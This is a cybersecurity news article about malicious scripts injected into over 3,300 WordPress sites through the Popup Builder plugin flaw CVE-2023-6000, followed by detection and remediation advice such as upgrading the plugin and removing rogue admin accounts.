Popup Builder Plugin Flaw Hits 3300 Sites with Malicious Code

March 12, 2024
The WordPress community is grappling with a significant cyber threat as over 3,300 websites have been compromised due to an unpatched flaw in the Popup Builder plugin, known as CVE-2023-6000. Attackers exploit this vulnerability by embedding malicious scripts within the ‘Custom JS or CSS’ area of the site admin panel. These scripts are surreptitiously triggered during popup interactions—when they are opened, closed, or their visibility is manipulated. Such actions cleverly subvert the plugin’s legitimate functionalities. Website owners and administrators are urged to address this security issue promptly by applying available updates or patches to safeguard their online presence against this pernicious code injection. The scale of this breach highlights the continual threat posed by cyber vulnerabilities and the necessity for vigilant security practices within the WordPress community.

Step 1: Malicious Code Pattern Recognition

The nefarious code implanted into the sites is known to trigger various events orchestrated to disrupt the popup’s functional flow, such as ‘sgpb-ShouldOpen,’ ‘sgpb-DidOpen,’ and ‘sgpb-DidClose.’ These events are part of the popup’s lifecycle, each firing at different intervals, allowing the infected popups to behave in unintended, potentially harmful ways. For instance, contact forms, possibly created with “Contact Form 7,” are redirected to a dubious URL, initiating the potential for further damage. Tools like SiteCheck can pinpoint these injections, which commonly manifest as “malware?pbuilder_injection=1.x.”

Step 2: Comprehensive Malware Mitigation and Cleansing

Cybersecurity experts recommend immediate action to counter this aggressive malware operation targeting vulnerable versions of the Popup Builder plugin. The contagion takes advantage of a known XSS vulnerability and executes itself within the confines of the plugin’s custom sections, directing visitors to phishing sites or delivering additional malware payloads. To tackle this chaos head-on, affected users should promptly upgrade the plugin to version 4.2.7 or newer. While web application firewalls (WAFs) can act as a buffer against such threats, they merely offer a temporary shield. What’s crucial is a full system scan to sniff out any latent backdoors left by the invaders. Furthermore, the extermination of suspicious admin accounts and a consistent routine of software updates are imperatives to secure a website from such incursions in the future.

Subscribe to our weekly news digest.

Join now and become a part of our fast-growing community.

Invalid Email Address
Thanks for Subscribing!
We'll be sending you our best soon!
Something went wrong, please try again later